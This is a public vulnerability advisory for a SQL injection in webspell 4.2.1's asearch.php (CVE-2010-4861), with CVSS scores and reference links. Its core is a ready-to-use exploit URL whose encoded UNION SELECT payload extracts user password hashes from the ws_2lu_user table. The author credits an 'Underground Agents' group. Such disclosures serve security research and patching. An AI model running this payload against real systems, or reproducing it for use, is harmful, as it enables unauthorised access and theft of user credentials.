webspell 4.2.1 asearch.php SQL Injection Vulnerability

2011-10-09 / 2011-10-10
Credit: silent vapor
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-4861
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################# INFORMATION ################################################## +Name : webspell 4.2.1 asearch.php SQL Injection Vulnerability +Author : silent vapor +Date : 29.09.2010 +Script : webspell 4.2.1 +Price : free +Language :PHP +Discovered by silent vapor +Underground Agents +Greetz to Team-Internet, 4004-Security-Project, Easy Laster ################################################################################ +Vulnerability : http://localhost/webspell/asearch.php?site=search&table=user& column=nickname&exact=true&identifier=userID&searchtemp=search_user&search= +Exploitable : http://localhost/webspell/asearch.php?site=search&table=user& column=nickname&exact=true&identifier=userID&searchtemp=search_user&search= admin%2527%20UNION+/**/+SELECT%201,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM %20ws_2lu_user%20WHERE%20%25271%2527=%25271 ################################################################################

References:

http://www.webspell.org/index.php?site=files&cat=21
http://xforce.iss.net/xforce/xfdb/62130
http://www.securityfocus.com/bid/43579
http://www.exploit-db.com/exploits/15151
http://packetstormsecurity.org/1009-exploits/webspell421-sql.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top